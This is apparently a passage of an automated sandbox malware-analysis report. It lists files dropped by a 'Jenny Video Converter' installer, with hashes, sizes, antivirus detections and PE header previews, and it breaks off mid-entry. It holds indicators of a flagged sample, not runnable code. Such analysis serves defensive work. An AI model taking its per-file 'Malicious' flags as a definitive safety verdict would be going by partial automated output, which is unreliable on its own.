                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....h........................lm.........................P................ .................................."...0..`....................@............................... .......................................................text...dg.......h..................`.P`.data...0............l..............@.0..rdata...............n..............@.@@/4......\............z..............@.0@.bss....,.............................`..edata..............................@.0@.idata...".......$..................@.0..CRT....,...........................@.0..tls.... .... ......................@.0..rsrc...`....0......................@.0..reloc.......@......................@.0B........................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Jenny Video Converter\is-SBF1H.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):441975
                                                                              Entropy (8bit):6.372283713065844
                                                                              Encrypted:false
                                                                              SSDEEP:6144:KOjlUsee63NlC1NiiA0XcQj0S5XTJAmLYWB6EYWOsIEvCmiu:DRGNq0wdAmcWBGsIEviu
                                                                              MD5:6CD78C8ADD1CFC7CBB85E2B971FCC764
                                                                              SHA1:5BA22C943F0337D2A408B7E2569E7BF53FF51CC5
                                                                              SHA-256:C75587D54630B84DD1CA37514A77D9D03FCE622AEA89B6818AE8A4164F9F9C73
                                                                              SHA-512:EAFDF6E38F63E6C29811D7D05821824BDAAC45F8B681F5522610EEBB87F44E9CA50CE690A6A3AA93306D6A96C751B2210F96C5586E00E323F26F0230C0B85301
                                                                              Malicious:false
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....~.........................a......................... ......A3........ ..........................'......................................|....................................................................................text...4|.......~..................`.P`.data...............................@.`..rdata..............................@.`@/4..................................@.0@.bss..................................`..edata...'.......(...R..............@.0@.idata...............z..............@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..|...........................@.0B................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Jenny Video Converter\is-SPPOJ.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):291245
                                                                              Entropy (8bit):6.234245376773595
                                                                              Encrypted:false
                                                                              SSDEEP:6144:dg6RpdbWJbnZ9zwvNOmdcm0sn+g2eqZq6eadTD8:UJ99zwvNOmdcm0s+g1qZQadTD8
                                                                              MD5:2D8A0BC588118AA2A63EED7BF6DFC8C5
                                                                              SHA1:7FB318DC21768CD62C0614D7AD773CCFB7D6C893
                                                                              SHA-256:707DEE17E943D474FBE24EF5843A9A37E923E149716CAD0E2693A0CC8466F76E
                                                                              SHA-512:A296A8629B1755D349C05687E1B9FAE7ED5DE14F2B05733A7179307706EA6E83F9F9A8729D2B028EDDC7CAF8C8C30D69AD4FEA6EC19C66C945772E7A34F100DE
                                                                              Malicious:false
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........h..@......#.........d....................4i................................<......... ......................p..5.......t...................................................................................<................................text...T...........................`.P`.data...0...........................@.0..rdata...v.......x..................@.`@/4...........@......................@.0@.bss.........`........................`..edata..5....p.......6..............@.0@.idata..t............>..............@.0..CRT....,............F..............@.0..tls.... ............H..............@.0..reloc...............J..............@.0B................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:modified
                                                                              Size (bytes):3296256
                                                                              Entropy (8bit):6.848028383299471
                                                                              Encrypted:false
                                                                              SSDEEP:49152:OPCE+ilwRfPKC1XeoIFEDxeCrijlZ3ivBjgBEAf05gJVKQ28g:4+hRHF5IcxeCrijlZkxgBEAf02L28g
                                                                              MD5:65FDD2B7C5D23EEF202604FCFEFD2FF4
                                                                              SHA1:1E13A70CFCA55D95EF41BBE4F9B3BCE49F801F52
                                                                              SHA-256:1CCC772B688396131DA8841478256D0ED7B7223EA2FEA006FB9F32B14281BB52
                                                                              SHA-512:F36F2291FC1F850703DC75A642806844DDC9CF333192B0B9B5FF90DFE93BC6E6875A62CF918BA9642C6A72AF2BA9A13CCE0176A898C47F5D7A818707D8F862EC
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L....D.L.................."..........y"......."...@...........................2.....*.3.....................................<.".......#.P,............................................................................".\............................text.....".......".................`....rdata...(...."..*....".............@..@_cde_2..8.....#..0....".............@....rsrc.........#.......#.............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Jenny Video Converter\libgcc_s_dw2-1.dll (copy)

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):121524
                                                                              Entropy (8bit):6.347995296737745
                                                                              Encrypted:false
                                                                              SSDEEP:1536:9v6EzEhAArrzEYz8V2clMs4v6C7382gYbByUDM6H0ZulNDnt8zXxgf:9T8AArrzDylMs5C738FYbpH0Ent8zBgf
                                                                              MD5:6CE25FB0302F133CC244889C360A6541
                                                                              SHA1:352892DD270135AF5A79322C3B08F46298B6E79C
                                                                              SHA-256:E06C828E14262EBBE147FC172332D0054502B295B0236D88AB0DB43326A589F3
                                                                              SHA-512:3605075A7C077718A02E278D686DAEF2E8D17B160A5FEDA8D2B6E22AABFFE0105CC72279ADD9784AC15139171C7D57DBA2E084A0BA22A6118FDBF75699E53F63
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....8r>....7......#.....^...................p.....n.........................0................ ........................._.................................... .......................................................................................text...X].......^..................`.P`.data... ....p.......b..............@.0..rdata........... ...d..............@.`@/4...............0..................@.0@.bss....(.............................`..edata.._...........................@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc....... ......................@.0B................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Jenny Video Converter\libgdk-win32-2.0-0.dll (copy)

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):814068
                                                                              Entropy (8bit):6.5113626552096
                                                                              Encrypted:false
                                                                              SSDEEP:24576:ZEygs0MDl9NALk12XBoO/j+QDr4TARkKtff8WvLCC2:vKMDl9aGO+/TAR5tff8og
                                                                              MD5:5B1EB4B36F189362DEF93BF3E37354CC
                                                                              SHA1:8C0A4992A6180D0256ABF669DFDEE228F03300BA
                                                                              SHA-256:D2D7D9821263F8C126C6D8758FFF0C88F2F86E7E69BFCC28E7EFABC1332EEFD7
                                                                              SHA-512:BF57664A96DC16DAD0BB22F6BE6B7DAE0BB2BA2C6932C8F64AEC953E77DC5CDA48E3E05FB98EFE766969832DBC6D7357F8B8D144BD438E366CE746B3B31E2C96
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Wl....i......#..............................Tl.................................`........ ..........................b...`...L.......h...................@...I...................................................j..X............................text..............................`.P`.data...............................@.`..rdata..\...........................@.`@/4.......S...p...T...H..............@.0@.bss..................................`..edata...b.......d..................@.0@.idata...L...`...L..................@.0..CRT....,............L..............@.0..tls.... ............N..............@.0..rsrc....h.......j...P..............@.0..reloc...I...@...J..................@.0B........................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Jenny Video Converter\libgdk_pixbuf-2.0-0.dll (copy)

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):181527
                                                                              Entropy (8bit):6.362061002967905
                                                                              Encrypted:false
                                                                              SSDEEP:3072:jJoxZgqj/2VkWePT1lempKE7PQrXGx6duqPhyxO+jOfMjHyv:jef/2eH72mprIs6VyfOfMY
                                                                              MD5:0D0D311D1837705B1EAFBC5A85A695BD
                                                                              SHA1:AA7FA3EB181CC5E5B0AA240892156A1646B45184
                                                                              SHA-256:AFB9779C4D24D0CE660272533B70D2B56704F8C39F63DAB0592C203D8AE74673
                                                                              SHA-512:14BC65823B77E192AACF613B65309D5A555A865AC00D2AB422FD209BD4E6C106ECCE12F868692C3EEA6DCCB3FE4AD6323984AEF60F69DA08888ABCD98D76327D
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$..............#..............................Te......................... ................ .........................b........#......................................................................................H............................text...$...........................`.P`.data...4...........................@.0..rdata...J.......L..................@.`@/4.......I... ...J..................@.0@.bss.........p........................`..edata..b............@..............@.0@.idata...#.......$...V..............@.0..CRT....,............z..............@.0..tls.... ............|..............@.0..rsrc................~..............@.0..reloc..............................@.0B........................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Jenny Video Converter\libgdkmm-2.4-1.dll (copy)

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):268404
                                                                              Entropy (8bit):6.265024248848175
                                                                              Encrypted:false
                                                                              SSDEEP:3072:yL8lD0bVAYhILCN0z+tUbO01CDXQ6yw+RseNYWFZvc/NNap:1Uy+tUbO01CDXQ6ywcYWFZvCNNap
                                                                              MD5:C4C23388109D8A9CC2B87D984A1F09B8
                                                                              SHA1:74C9D9F5588AFE721D2A231F27B5415B4DEF8BA6
                                                                              SHA-256:11074A6FB8F9F137401025544121F4C3FB69AC46CC412469CA377D681D454DB3
                                                                              SHA-512:060F175A87FBDF3824BEED321D59A4E14BE131C80B7C41AFF260291E69A054F0671CC67E2DDA3BE8A4D953C489BC8CDE561332AA0F3D82EF68D97AFCF115F6A3
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....V...................p....4j.......................................... ......................`.......`..xk..............................D....................................................k...............................text....T.......V..................`.P`.data... ....p.......Z..............@.0..rdata..X ......."...\..............@.`@/4......0............~..............@.0@.bss....H....P........................`..edata.......`......................@.0@.idata..xk...`...l..................@.0..CRT....,............x..............@.0..tls.... ............z..............@.0..reloc..D............|..............@.0B................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Jenny Video Converter\libglibmm-2.4-1.dll (copy)

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):463112
                                                                              Entropy (8bit):6.363613724826455
                                                                              Encrypted:false
                                                                              SSDEEP:12288:qyoSS9Gy176UixTUTfeKEVfA/K4FW0BGXOjY:pS93176nxTUTEA/Kuk
                                                                              MD5:D9D9C79E35945FCA3F9D9A49378226E7
                                                                              SHA1:4544A47D5B9765E5717273AAFF62724DF643F8F6
                                                                              SHA-256:18CBD64E56CE58CE7D1F67653752F711B30AD8C4A2DC4B0DE88273785C937246
                                                                              SHA-512:B0A9CEFAC7B4140CC07E880A336DCBAB8B6805E267F4F8D9423111B95E4D13544D8952D75AB51ADE9F6DACE93A5425E6D41F42C2AA88D3A3C233E340EE785EB9
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........V.........#.........R....................lf.......................................... ......................@..w.......................................<....................................................................................text...$...........................`.P`.data... ...........................@.0..rdata...J.......L..................@.`@/4..................................@.0@.bss....h....0........................`..edata..w....@......................@.0@.idata..............................@.0..CRT....,............4..............@.0..tls.... ............6..............@.0..reloc..<............8..............@.0B................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Jenny Video Converter\libgmodule-2.0-0.dll (copy)

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):26562
                                                                              Entropy (8bit):5.606958768500933
                                                                              Encrypted:false
                                                                              SSDEEP:768:EaiL7abI5n6MnFUKs7qfSWWmJZLfw2tnPrPkV:4XabI5n5niKsOwmnU
                                                                              MD5:E9C7068B3A10C09A283259AA1B5D86F2
                                                                              SHA1:3FFE48B88F707AA0C947382FBF82BEE6EF7ABB78
                                                                              SHA-256:06294F19CA2F7460C546D4D0D7B290B238C4959223B63137BB6A1E2255EDA74F
                                                                              SHA-512:AC4F521E0F32DBF104EF98441EA3403F0B7D1B9D364BA8A0C78DAA056570649A2B45D3B41F0B16A1A73A09BAF2870D23BD843E6F7E9149B697F7E6B7222E0B81
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....7G7.Z..V......#.....(...V...............@.....m.......................................... .........................O...............p.......................l.......................................................@............................text....&.......(..................`.P`.data...0....@.......,..............@.0..rdata.......P......................@.0@/4...........`.......6..............@.0@.bss.........p........................`..edata..O............B..............@.0@.idata...............D..............@.0..CRT....,............N..............@.0..tls.... ............P..............@.0..rsrc...p............R..............@.0..reloc..l............V..............@.0B........................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Jenny Video Converter\libgobject-2.0-0.dll (copy)

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):337171
                                                                              Entropy (8bit):6.46334441651647
                                                                              Encrypted:false
                                                                              SSDEEP:3072:TQkk4LTVKDKajZjp8aEEHeEkls4q5dRIFSqObK/q+P82JSccgSGDGxQXKHlTmn93:3kwpKlf1QNSqOb6q+PRJb6GDGmKH893
                                                                              MD5:51D62C9C7D56F2EF2F0F628B8FC249AD
                                                                              SHA1:33602785DE6D273F0CE7CA65FE8375E91EF1C0BC
                                                                              SHA-256:FC3C82FAB6C91084C6B79C9A92C08DD6FA0659473756962EFD6D8F8418B0DD50
                                                                              SHA-512:03FB13AE5D73B4BABA540E3358335296FB28AA14318C27554B19BB1E90FAD05EA2DD66B3DB216EA7EED2A733FE745E66DB2E638F5ED3B0206F5BE377F931DF5B
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...2..............#......................... .....c.........................`................ ..........................8........... .......................0.../......................................................`............................text...............................`.P`.data...`.... ......................@.0..rdata..4....0......................@.`@/4......D...........................@.0@.bss..................................`..edata...8.......:...p..............@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc........ ......................@.0..reloc.../...0...0..................@.0B........................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Jenny Video Converter\libgomp-1.dll (copy)

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):174543
                                                                              Entropy (8bit):6.3532700320638025
                                                                              Encrypted:false
                                                                              SSDEEP:3072:F4yjzZ0q/RZ1vAjhByeVjxSTi7p2trtfKomZr8jPnJe0rkUlRGptdKH69T5GNg9v:FjjE0PCn3baPXuD7
                                                                              MD5:65D8CB2733295758E5328E5A3E1AFF15
                                                                              SHA1:F2378928BB9CCFBA566EC574E501F6A82A833143
                                                                              SHA-256:E9652AB77A0956C5195970AF39778CFC645FC5AF22B95EED6D197DC998268642
                                                                              SHA-512:BF6AA62EA82DFDBE4BC42E4D83469D3A98BFFE89DBAB492F8C60552FCB70BBA62B8BF7D4BDAB4045D9BC1383A423CAA711E818F2D8816A80B056BC65A52BC171
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........g......#...............................c................................6......... .........................Y@......................................0....................................................................................text...D...........................`.P`.data...............................@.`..rdata..0".......$..................@.`@/4.......Z.......\..................@.0@.bss....t....p........................`..edata..Y@.......B...8..............@.0@.idata...............z..............@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..0...........................@.0B................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Jenny Video Converter\libgraphite2.dll (copy)

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):235032
                                                                              Entropy (8bit):6.398850087061798
                                                                              Encrypted:false
                                                                              SSDEEP:6144:fWa7MVS9CtXk4wP0filbZ5546Qx/cwx/svQbKDazN1x:3MVTtXlwP0f0rK6QxEYz
                                                                              MD5:E1D0ACD1243F9E59491DC115F4E379A4
                                                                              SHA1:5E9010CFA8D75DEFBDC3FB760EB4229ACF66633B
                                                                              SHA-256:FD574DA66B7CCAE6F4DF31D5E2A2C7F9C5DAE6AE9A8E5E7D2CA2056AB29A8C4F
                                                                              SHA-512:392AA2CF6FBC6DAA6A374FD1F34E114C21234061855413D375383A97951EC5DDDF91FD1C431950045105746898E77C5C5B4D217DF0031521C69403EA6ADE5C27
                                                                              Malicious:false
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........Y......#..............................tp.......................................... .........................$...............................................................................................<............................text...............................`.P`.data...L...........................@.0..rdata...1.......2..................@.`@/4.......m... ...n..................@.0@.bss..................................`..edata..$............`..............@.0@.idata...............j..............@.0..CRT....,............t..............@.0..tls.... ............v..............@.0..reloc...............x..............@.0B................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Jenny Video Converter\libharfbuzz-0.dll (copy)

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):441975
                                                                              Entropy (8bit):6.372283713065844
                                                                              Encrypted:false
                                                                              SSDEEP:6144:KOjlUsee63NlC1NiiA0XcQj0S5XTJAmLYWB6EYWOsIEvCmiu:DRGNq0wdAmcWBGsIEviu
                                                                              MD5:6CD78C8ADD1CFC7CBB85E2B971FCC764
                                                                              SHA1:5BA22C943F0337D2A408B7E2569E7BF53FF51CC5
                                                                              SHA-256:C75587D54630B84DD1CA37514A77D9D03FCE622AEA89B6818AE8A4164F9F9C73
                                                                              SHA-512:EAFDF6E38F63E6C29811D7D05821824BDAAC45F8B681F5522610EEBB87F44E9CA50CE690A6A3AA93306D6A96C751B2210F96C5586E00E323F26F0230C0B85301
                                                                              Malicious:false
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....~.........................a......................... ......A3........ ..........................'......................................|....................................................................................text...4|.......~..................`.P`.data...............................@.`..rdata..............................@.`@/4..................................@.0@.bss..................................`..edata...'.......(...R..............@.0@.idata...............z..............@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..|...........................@.0B................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Jenny Video Converter\libintl-8.dll (copy)

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):140752
                                                                              Entropy (8bit):6.52778891175594
                                                                              Encrypted:false
                                                                              SSDEEP:3072:Uw0ucwd0gZ36KErK+i+35KwO/hVQN6ulXazERIdF+aP2je8g5og96:ZlcWpErK+i9zEQF+aPKZo6
                                                                              MD5:A8F646EB087F06F5AEBC2539EB14C14D
                                                                              SHA1:4B1FBAB6C3022C3790BC0BD0DD2D9F3BA8FF1759
                                                                              SHA-256:A446F09626CE7CE63781F5864FDD6064C25D9A867A0A1A07DCECB4D5044B1C2B
                                                                              SHA-512:93BB40C5FE93EF97FE3BC82A0A85690C7B434BD0327BB8440D51053005A5E5B855F9FCC1E9C676C43FF50881F860817FF0764C1AD379FC08C4920AA4A42C5DBC
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........w......#.....T...................p.....a.......................................... ......................0.......@.......p..@.......................T............................`......................8B...............................text....R.......T..................`.P`.data........p.......X..............@.`..rdata...F.......H...\..............@.`@/4......L3.......4..................@.0@.bss....@.............................`..edata.......0......................@.0@.idata.......@......................@.0..CRT....,....P......................@.0..tls.... ....`......................@.0..rsrc...@....p......................@.0..reloc..T...........................@.0B........................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Jenny Video Converter\libjpeg-8.dll (copy)

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):509934
                                                                              Entropy (8bit):6.031080686301204
                                                                              Encrypted:false
                                                                              SSDEEP:6144:wx/Eqtn5oeHkJstujMWYVgUr/MSK/zwazshLKl11PC5qLJy1Pkfsm:M/NDXEJIPVgUrgbzslW11UqLJokfsm
                                                                              MD5:02E6C6AB886700E6F184EEE43157C066
                                                                              SHA1:E796B7F7762BE9B90948EB80D0138C4598700ED9
                                                                              SHA-256:EA53A198AA646BED0B39B40B415602F8C6DC324C23E1B9FBDCF7B416C2C2947D
                                                                              SHA-512:E72BC0A2E9C20265F1471C30A055617CA34DA304D7932E846D5D6999A8EBCC0C3691FC022733EAEB74A25C3A6D3F347D3335B902F170220CFE1DE0340942B596
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........P......#...............................k......................... ......CY........ .....................................................................................................................|...,............................text...T...........................`.P`.data...............................@.0..rdata..XN.......P..................@.`@/4.......x...0...z..................@.0@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..............................@.0B................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Jenny Video Converter\liblcms2-2.dll (copy)

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):397808
                                                                              Entropy (8bit):6.396146399966879
                                                                              Encrypted:false
                                                                              SSDEEP:6144:q6WhfTNgMVVPwCxpk76CcIAg8TQfn9l1bBE3A97vupNBXH:q60TvSGpk7eIAg489l1S3A97vkVH
                                                                              MD5:E0747D2E573E0A05A7421C5D9B9D63CC
                                                                              SHA1:C45FC383F9400F8BBE0CA8E6A7693AA0831C1DA7
                                                                              SHA-256:25252B18CE0D80B360A6DE95C8B31E32EFD8034199F65BF01E3612BD94ABC63E
                                                                              SHA-512:201EE6B2FD8DCD2CC873726D56FD84132A4D8A7434B581ABD35096A5DE377009EC8BC9FEA2CC223317BBD0D971FB1E61610509E90B76544BDFF069E0D6929AED
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\4......n......#......................... ....Dk.......................................... ..........................5...0...............................`..T............................P.......................2...............................text...D...........................`.P`.data...X1... ...2..................@.`..rdata..x....`.......F..............@.`@/4..................................@.0@.bss....`.............................`..edata...5.......6..................@.0@.idata.......0......................@.0..CRT....,....@......................@.0..tls.... ....P......................@.0..reloc..T....`......................@.0B................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Jenny Video Converter\liblzma-5.dll (copy)

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):171848
                                                                              Entropy (8bit):6.579154579239999
                                                                              Encrypted:false
                                                                              SSDEEP:3072:LrhG5+L/AcY680k2SxVqetJP5Im+A9mNoWqlM5ywwoS:LV6+LA0G0enP5PFYOWi6w1
                                                                              MD5:236A679AB1B16E66625AFBA86A4669EB
                                                                              SHA1:73AE354886AB2609FFA83429E74D8D9F34BD45F2
                                                                              SHA-256:B1EC758B6EDD3E5B771938F1FEBAC23026E6DA2C888321032D404805E2B05500
                                                                              SHA-512:C19FA027E2616AC6B4C18E04959DFE081EF92F49A11260BA69AFE10313862E8FEFF207B9373A491649928B1257CF9B905F24F073D11D71DCD29B0F9ADAC80248
                                                                              Malicious:false
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... ......;......#...............................c................................q......... .........................,.......<.......H...........................................................................(................................text...............................`.P`.data... ...........................@.0..rdata..|y.......z..................@.`@/4......HN...@...P... ..............@.0@.bss..................................`..edata..,............p..............@.0@.idata..<............~..............@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...H...........................@.0..reloc..............................@.0B........................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Jenny Video Converter\libpango-1.0-0.dll (copy)

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):259014
                                                                              Entropy (8bit):6.075222655669795
                                                                              Encrypted:false
                                                                              SSDEEP:3072:O4WGkOMuCsxvlBUlthMP3SyyqX3/yfGG7ca/RM3yH8Tw/yr+Jg8jGCzftns9/1tA:tWGkOME304A7ca/RNyN8jGCzftngvA
                                                                              MD5:B4FDE05A19346072C713BE2926AF8961
                                                                              SHA1:102562DE2240042B654C464F1F22290676CB6E0F
                                                                              SHA-256:513CEC3CCBE4E0B31542C870793CCBDC79725718915DB0129AA39035202B7F97
                                                                              SHA-512:9F3AEE3EBF04837CEEF08938795DE0A044BA6602AACB98DA0E038A163119C695D9CC2CA413BD709196BFD3C800112ABABC3AF9E2E9A0C77D88BD4A1C88C2ED27
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#..............................xe.........................@.......{........ .........................+;......L.......0.................... ..8...................................................h................................text...............................`.P`.data...$...........................@.0..rdata.../.......0..................@.`@/4.......l.......n..................@.0@.bss....,.............................`..edata..+;.......<...d..............@.0@.idata..L...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...0...........................@.0..reloc..8.... ......................@.0B........................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Jenny Video Converter\libpangocairo-1.0-0.dll (copy)

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):64724
                                                                              Entropy (8bit):5.910307743399971
                                                                              Encrypted:false
                                                                              SSDEEP:768:U84Oo2LbVtfNsqnYPL7cZ690d+yCG7QiZggD0Spo3YfklbTRPmK0Lz:Uf2LbVtfDGLr2xk4DU3YfkhTRuKW
                                                                              MD5:7AF455ADEA234DEA33B2A65B715BF683
                                                                              SHA1:F9311CB03DCF50657D160D89C66998B9BB1F40BA
                                                                              SHA-256:6850E211D09E850EE2510F6EAB48D16E0458BCE35916B6D2D4EB925670465778
                                                                              SHA-512:B8AC3E2766BB02EC37A61218FAF60D1C533C0552B272AF6B41713C17AB69C3731FA28F3B5D73766C5C59794D5A38CC46836FD93255DF38F7A3ABD219D51BB41A
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....h........................lm.........................P................ .................................."...0..`....................@............................... .......................................................text...dg.......h..................`.P`.data...0............l..............@.0..rdata...............n..............@.@@/4......\............z..............@.0@.bss....,.............................`..edata..............................@.0@.idata...".......$..................@.0..CRT....,...........................@.0..tls.... .... ......................@.0..rsrc...`....0......................@.0..reloc.......@......................@.0B........................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Jenny Video Converter\libpangoft2-1.0-0.dll (copy)

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\is-PNPJE.tmp\N6jsQ3XNNX.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                              Category:dropped
